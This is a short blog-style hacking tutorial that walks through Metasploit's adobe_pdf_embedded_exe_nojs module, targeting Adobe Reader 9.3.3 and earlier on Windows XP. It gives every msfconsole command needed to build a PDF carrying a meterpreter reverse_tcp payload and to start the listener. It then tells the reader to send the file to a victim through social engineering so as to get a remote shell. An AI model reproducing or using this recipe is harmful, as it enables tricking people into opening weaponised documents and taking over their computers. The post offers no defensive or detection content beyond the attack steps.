This module embeds a Metasploit payload into an existing PDF file in a non-standard method. The resulting PDF can be sent to a target as part of a social engineering attack.
0 – Adobe Reader <= v9.3.3 (Windows XP SP3 English) (default)
Attacker: Backtrack 5
Victim PC: Windows XP
Open backtrack terminal type msfconsole
Now type use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs
Msf exploit (adobe_pdf_embedded_exe_nojs)>set payload windows/meterpreter/reverse_tcp
Msf exploit (adobe_pdf_embedded_exe_nojs)>set lhost 192.168.1.3 (IP of Local Host)
Msf exploit (adobe_pdf_embedded_exe_nojs)>set filename story.pdf
Msf exploit (adobe_pdf_embedded_exe_nojs)>exploit
After we successfully generate the malicious PDF, it will stored on your local computer
Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.3
Now send your story.pdf files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer
Didn't find any related posts :(
About Raj Chandel (723 posts)
Raj Chandel is a Skilled and Passionate IT Professional especially in IT-Hacking Industry. At present other than his name he can also be called as An Ethical Hacker, A Cyber Security Expert, A Penetration Tester. With years of quality Experience in IT and software industry.His interests are mainly in system exploitation and vulnerability research.
Contact me: [email protected]